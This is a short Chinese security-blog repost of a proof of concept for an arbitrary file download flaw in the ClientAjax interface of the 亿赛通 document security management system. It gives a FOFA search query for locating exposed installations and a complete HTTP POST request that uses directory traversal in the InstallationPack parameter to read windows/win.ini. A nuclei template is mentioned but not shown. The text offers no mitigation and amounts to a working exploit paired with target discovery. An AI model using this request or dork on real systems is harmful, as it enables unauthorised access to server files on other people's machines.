亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载

admin 2024年2月21日21:16:44评论35 views字数 529阅读1分45秒阅读模式
00

漏洞概述

亿赛通 ClientAjax接口中InstallationPack参数可进行目录遍历,下载希特文件至本地。

01

空间搜索语法

FoFa 

title="电子文档安全管理系统"

02

利用过程

登录页面如下

亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载

下载文件数据包如下:

POST /CDGServer3/ClientAjax HTTP/1.1Host:  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36Connection: closeContent-Length: 102Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflate, br
command=downclientpak&InstallationPack=../../../../../../../../../../windows/win.ini&forward=index.jsp

亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载

03

nuclei poc

亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载

原文始发于微信公众号(天澜实验室):亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月21日21:16:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载https://cn-sec.com/archives/2511666.html

发表评论

匿名网友 填写信息